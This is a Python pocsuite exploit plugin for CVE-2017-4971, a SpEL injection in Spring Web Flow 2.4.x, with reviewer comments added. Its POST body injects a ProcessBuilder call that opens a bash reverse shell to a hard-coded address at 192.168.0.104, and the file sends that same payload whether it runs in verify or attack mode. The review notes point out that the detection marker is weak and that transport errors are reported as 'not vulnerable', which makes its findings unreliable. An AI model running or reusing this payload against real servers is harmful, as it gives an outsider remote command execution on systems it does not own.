#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

# Static request headers sent with every probe by poc().
# NOTE(review): the `Cookie` value below is a fixed session id copied from one
# lab run, not obtained from the target, so it carries no real session state;
# the same holds for the `_csrf` value embedded in poc_str.
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
           'Cache-Control': 'max-age=0',
           'Upgrade-Insecure-Requests':'1',
           'Content-Type':'application/x-www-form-urlencoded',
           'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
           'Cookie':'JSESSIONID=EB19A75A98344983B9018240B60EAD4D',
           'Accept-Language':'zh-CN,zh;q=0.9',
           'Connection':'close'
           }
# Request body POSTed by poc(): a Spring Web Flow data-binding field whose
# *name* is a SpEL expression (the CVE-2017-4971 vector described in
# TestPOC.desc).  The expression embeds a fixed command with a hard-coded
# callback address, and poc() sends it unmodified to whatever URL it is given;
# there is no harmless "verify-only" variant of this body anywhere in the file,
# so verify mode and attack mode are operationally the same request.
poc_str='''_eventId_confirm=&_csrf=3bc3dd42-df01-43dc-a50c-39add3a54db3&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.0.104/21+0>%261")).start()=vulhub'''
def poc(url):
    """POST the module-level ``poc_str`` to *url* and return the response text.

    A scheme is prepended when missing, the Spring Web Flow booking endpoint
    is appended, and the request is sent with the module-level ``headers``.

    Returns:
        The response body, or ``""`` when the request raises for any reason
        (connection refused, timeout, TLS failure, ...).  The caller
        (``TestPOC._verify``) cannot distinguish that ``""`` from a target
        that answered but did not match, so a transport error reads as
        "not vulnerable".
    """
    target = url if url.startswith("http") else "http://" + url
    # The scheme just prepended already contains "/", so this check passes for
    # practically every input: the path is appended unconditionally, and an
    # input ending in "/" produces ".../" + "/hotels/booking" (a double slash).
    if "/" in target:
        target = target + '/hotels/booking?execution=e1s2'
    try:
        # verify=False disables certificate validation for this probe.
        return req.post(target, data=poc_str, verify=False, timeout=5, headers=headers).text
    except Exception:
        # Every failure is collapsed to an empty body; see the docstring.
        return ""
class TestPOC(POCBase):
    """pocsuite plugin for CVE-2017-4971 (Spring Web Flow SpEL injection).

    Verify and attack mode both send the same request body through ``poc``
    and look for a single marker string in the response.
    """
    name = 'spring_web_flow_RCE_CVE-2017-4971'
    vulID = 'CVE-2017-4971'  # https://www.seebug.org/vuldb/ssvid-93190
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.jianshu.com/p/ad391cb9a95b']
    desc = '''
		   Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），
           可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，
           如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。
            参考链接：
            - https://threathunter.org/topic/593d562353ab369c55425a90
            - https://pivotal.io/security/cve-2017-4971
		   '''
    vulDate = '2020-02-07'
    createDate = '2020-02-07'
    updateDate = '2020-02-07'
    appName = 'SpringWebFlow'
    appVersion = '2.4.0 ~ 2.4.4'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        """Attack mode: identical to verify mode, since ``poc`` has only one body."""
        return self._verify()

    def _verify(self):
        """Verify mode: send the probe and report a hit when the marker appears.

        The marker is the generic Spring servlet exception wrapper.
        NOTE(review): other 500-class failures on this endpoint presumably
        surface the same class name, so a hit is weak evidence on its own --
        confirm against a known-patched instance before relying on it.
        """
        marker = 'org.springframework.web.util.NestedServletException'
        body = poc(self.url)
        findings = {}
        if marker in body:
            findings['VerifyInfo'] = {
                'URL': self.url + ' SpringWebFlow_RCE_CVE-2017-4971 is exist!',
            }
        return self.parse_output(findings)

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success when non-empty, fail otherwise.

        An empty *result* also covers the case where ``poc`` swallowed a
        transport error and returned ``""``.
        """
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
        else:
            output.success(result)
        return output


# Make the plugin discoverable by the pocsuite loader.
register(TestPOC)